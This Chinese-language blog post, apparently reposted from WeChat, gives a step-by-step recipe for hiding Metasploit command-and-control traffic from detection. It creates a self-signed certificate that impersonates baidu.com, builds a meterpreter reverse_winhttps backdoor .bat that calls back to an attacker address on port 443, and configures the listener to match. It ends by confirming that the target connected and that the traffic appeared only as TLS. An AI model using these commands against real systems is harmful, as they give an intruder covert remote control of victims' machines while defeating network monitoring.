由于传播、利用此文所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任
MSF流量加密躲避检测
对于OpenSSL不了解的,可以去看下我上一篇文章
https://mp.weixin.qq.com/s/2ja07gCboEVU0D18BQIa0g
使用OpenSSL加密
生成证书
这里C=UK;ST=London等可以对应下面的HTTPS证书看就明白是什么意思了
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com"
-keyout www.baidu.com.key
-out www.baidu.com.crt &&
cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem &&
rm -f www.baidu.com.key www.baidu.com.crt
MSF生成后门
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.152.130 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o msf_winhttps.bat
设置监听器
配置监听器时,要用到两个附加选项,目的是告诉处理程序它将使用的证书(与有效负载相同),并在接收到连接时执行SSL证书的验证
HandlerSSLCert
StageVerifySSLCert
set payload windows/meterpreter/reverse_winhttps
set lhost 192.168.152.130
set lport 443
set HandlerSSLCert /root/www.baidu.com.pem(不能中文路径)
set StageVerifySSLCert true
开启监听后,可以去看看是否开启了https
可以看到此处已经开启了https,并且也可以查看证书
查看证书
目标机运行msf_winhttps.bat,成功上线
验证是否加密
打开wireshark查看,TLSv1.2,成功加密
原文始发于微信公众号(Nurburgring):MSF流量加密躲避检测
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论